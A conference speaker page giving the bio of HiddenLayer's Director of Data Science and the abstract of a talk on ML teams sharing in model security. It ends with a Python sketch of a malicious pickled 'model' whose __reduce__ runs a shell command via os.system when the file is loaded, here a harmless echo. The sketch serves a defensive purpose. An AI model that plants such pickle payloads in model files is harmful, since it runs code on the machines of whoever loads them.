Hailey Buckingham

Director of Data Science at HiddenLayer

    Hailey Buckingham is the Director of Data Science at HiddenLayer, where she is responsible for the strategy, planning, and execution of the company's AI and ML initiatives. Her career has spanned multiple industries, including finance, transportation, wildfire policy, and cybersecurity, where she built and managed research and engineering teams and data science programs and played a pivotal role in developing some of the first adversarial AI countermeasures. She has extensive experience architecting enterprise-scale ML solutions and leading the cross-disciplinary teams that deliver them, with a particular focus on maintaining the highly functional, collaborative teams of experts that make large-scale AI projects possible.

    All Sessions by Hailey Buckingham

    Day 2, 04/24/2024
    3:30 pm - 3:40 pm

    I don't always secure my ML models, but when I do...

    ML Safety & Security

    Cyber attacks against ML and AI systems are becoming more and more frequent. Public, open-source ML models are essentially code-as-data, which puts our organizations at risk. But whose responsibility is it to secure these systems? ML operations and engineering teams already split their time between operationalizing ML systems and researcher enablement, and adding security workloads might seem like a step too far. Yet there are many benefits ML teams can gain by taking part in security concerns, benefits that may make the effort well worth it, not only for the overall organization but for the ML teams themselves.

    Spending cycles on security hardening is far from desirable for most ML operations and engineering teams. At first glance, engaging in an entirely new discipline seems like folly given the already diverse set of disciplines ML and AI projects require. Furthermore, shifting security operations responsibilities onto teams that likely have little or no security training should reasonably raise at least one eyebrow. But looking a little deeper, it turns out there are good reasons for ML engineers, ML ops teams, and even data scientists to participate in security thinking and planning. From a deeper understanding of the ML systems themselves, to insights into user behavior, to reinforcing good operational habits, the benefits to ML teams are plentiful, and that's even before an ML-based security event comes into play.

    In this talk we'll dive into each of these areas in detail. We'll discuss how using security tools specifically designed for AI can bring a number of additional benefits that are likely already on ML teams' wishlists. These same tools will also help increase collaboration with security teams and improve the organization's security posture.
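
    To make the "code-as-data" point concrete, here is a minimal Python sketch (illustrative only, not taken from the talk) of how a pickled model file can execute arbitrary code the moment it is loaded. The MaliciousModel class and the model.pkl filename are hypothetical:

        import os
        import pickle

        # A pickled "model" is code-as-data: any object can define
        # __reduce__, and the unpickler executes it during loading.
        class MaliciousModel:
            def __reduce__(self):
                # Serializes a call to os.system; the command runs the
                # moment the file is deserialized.
                return (os.system, ("echo arbitrary code ran at load time",))

        # An attacker publishes this file as a "pretrained model"...
        with open("model.pkl", "wb") as f:
            pickle.dump(MaliciousModel(), f)

        # ...and the victim's pipeline runs the payload simply by loading
        # it, before any inference ever happens.
        with open("model.pkl", "rb") as f:
            pickle.load(f)

    This is why loading an untrusted model artifact is equivalent to running untrusted code, and why scanning and provenance checks on model files matter to ML teams as much as to security teams.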
